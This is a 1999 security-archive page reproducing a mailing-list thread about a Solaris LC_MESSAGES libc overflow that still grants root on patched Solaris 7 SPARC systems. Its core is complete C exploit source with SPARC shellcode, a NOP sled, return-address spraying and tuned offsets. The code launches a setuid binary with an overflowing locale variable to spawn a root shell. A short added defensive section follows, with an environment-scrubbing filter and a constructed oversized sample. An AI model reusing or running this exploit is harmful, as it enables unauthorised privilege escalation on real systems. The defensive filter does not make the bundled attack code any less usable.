solaris_LCmessages.txt

Published 22 Sep 1999. Reported by Packet Storm (packetstormsecurity.com).

Solaris LC_MESSAGES exploit allows root access despite claimed fixes for version 7.

Code
Subject: Question on Solaris LC_MESSAGES libc exploit
To: [email protected]

Hello,

A previous message stated that the LC_MESSAGES bug in Solaris has been fixed in 7. However, I am still able to gain root with the below code on Sparc Solaris 7 5/99 Release boxes with MU2 and the 7_Recommended patch set installed (offset 7152 gets root for me). Has there been a patch released for Solaris 7 that addresses this? Thanks for any help.

Viraj.

---------- Forwarded message ----------
Date: Sun, 23 May 1999 14:25:26 +0100
From: acpizer <[email protected]>
To: [email protected]
Subject: Re: Solaris libc exploit

Hi guys,

Below is a slightly modified exploit which will allow the user to specify the offset. The author has not provided offsets for 2.7/SPARC, so here they are; any one of these can be used: 7144, 7152, 7160, 7168...

Cheers.

-- snip --
```c
/*============================================================
  ex_lobc.c Overflow Exploits (for Sparc Edition)
  The Shadow Penguin Security
  (http://base.oc.to:/skyscraper/byte/551)
  Written by UNYUN ([email protected])

  offsets for 2.7/SPARC: 7144, 7152, 7160, 7168, and more...
  offset for 2.6/SPARC: 5392
  ============================================================
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define EV "LC_MESSAGES="
#define ADJUST 0
#define STARTADR 400
#define NOP 0xa61cc013
#define RETS 600

char x[80000];

char exploit_code[] =
"\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e"
"\x2b\x0b\xda\xdc\xae\x15\x63\x68"
"\x90\x0b\x80\x0e\x92\x03\xa0\x0c"
"\x94\x10\x20\x10\x94\x22\xa0\x10"
"\x9c\x03\xa0\x14"
"\xec\x3b\xbf\xec\xc0\x23\xbf\xf4\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc"
"\x82\x10\x20\x3b\x91\xd0\x20\x08\x90\x1b\xc0\x0f\x82\x10\x20\x01"
"\x91\xd0\x20\x08"
;

/* Returns the current stack pointer (SPARC-specific inline asm). */
unsigned long get_sp(void)
{
    __asm__("mov %sp,%i0 \n");
}

int i;
unsigned int ret_adr;

int main(int argc, char *argv[])
{
    int OFFSET;

    putenv("LANG=");
    memset(x, 'x', 70000);

    if (argc == 2)
        OFFSET = atoi(argv[1]);
    else
        OFFSET = 5392; /* default offset for 2.6 */

    for (i = 0; i < ADJUST; i++) x[i] = 0x40;
    for (i = ADJUST; i < 1000; i += 4) {
        x[i+3] = NOP & 0xff;
        x[i+2] = (NOP >> 8) & 0xff;
        x[i+1] = (NOP >> 16) & 0xff;
        x[i+0] = (NOP >> 24) & 0xff;
    }
    for (i = 0; i < strlen(exploit_code); i++)
        x[STARTADR+i+ADJUST] = exploit_code[i];
    ret_adr = get_sp() - OFFSET;
    printf("jumping address : %lx, offset = %d\n", (unsigned long)ret_adr, OFFSET);
    if ((ret_adr & 0xff) == 0) {
        ret_adr -= 16;
        printf("New jumping address : %lx\n", (unsigned long)ret_adr);
    }
    for (i = ADJUST+RETS; i < RETS+600; i += 4) {
        x[i+3] = ret_adr & 0xff;
        x[i+2] = (ret_adr >> 8) & 0xff;
        x[i+1] = (ret_adr >> 16) & 0xff;
        x[i+0] = (ret_adr >> 24) & 0xff;
    }
    memcpy(x, EV, strlen(EV));
    x[3000] = 0;
    putenv(x);
    execl("/bin/rsh", "su", (char *)0);
    return 0;
}
```
-- snip --

-------------------------------------------------------------------------------
"Probably you've only really grown up, when you can bear not being understood."

Marian Gold /Alphaville
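A defensive counterpart to the thread above, added here and not part of the original post or of the exploit's code: a filter that a setuid wrapper or login program could apply to its environment before anything in libc reads it, dropping locale variables (LANG, LC_*) whose value is oversized or contains characters no real locale name uses. The 64-byte bound, the allowed character set and the function names are assumptions chosen for illustration, not Sun's actual fix.

```c
#include <ctype.h>
#include <string.h>
/* Assumed policy (not Sun's actual patch): a locale value is short and uses
 * only characters found in real locale names, e.g. en_US.ISO8859-1. */
#define LOCALE_MAX_LEN 64
static const char *locale_prefixes[] = { "LANG=", "LC_ALL=", "LC_MESSAGES=",
    "LC_CTYPE=", "LC_COLLATE=", "LC_MONETARY=", "LC_NUMERIC=", "LC_TIME=", NULL };

/* 1 if entry ("NAME=value") names a locale variable, else 0. */
int is_locale_var(const char *entry)
{
    for (size_t i = 0; locale_prefixes[i] != NULL; i++)
        if (strncmp(entry, locale_prefixes[i], strlen(locale_prefixes[i])) == 0)
            return 1;
    return 0;
}

/* 1 if the value after '=' meets the length and character policy, else 0. */
int locale_value_ok(const char *entry)
{
    const char *v = strchr(entry, '=');
    if (v == NULL || strlen(++v) > LOCALE_MAX_LEN) return 0;
    for (; *v != '\0'; v++) {
        unsigned char c = (unsigned char)*v;
        if (!isalnum(c) && c != '_' && c != '-' && c != '.' && c != '@') return 0;
    }
    return 1;
}

/* Drop offending locale entries from a NULL-terminated envp in place, keeping
 * everything else in order; returns how many entries were dropped. */
int scrub_locale_env(char **envp)
{
    int dropped = 0;
    size_t w = 0;
    for (size_t r = 0; envp[r] != NULL; r++) {
        if (is_locale_var(envp[r]) && !locale_value_ok(envp[r])) { dropped++; continue; }
        envp[w++] = envp[r];
    }
    envp[w] = NULL;
    return dropped;
}

/* Constructed sample: a sane LANG plus a 3000-byte LC_MESSAGES like the post's. */
int demo(void)
{
    static char big[3001];
    memset(big, 'x', 3000); big[3000] = '\0';
    memcpy(big, "LC_MESSAGES=", 12);
    char *env[] = { "HOME=/tmp", "LANG=en_US.ISO8859-1", big, "LC_ALL=C", NULL };
    return scrub_locale_env(env);  /* returns 1: only the oversized entry goes */
}
```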


Vulners AI Score: 7.4 (High risk)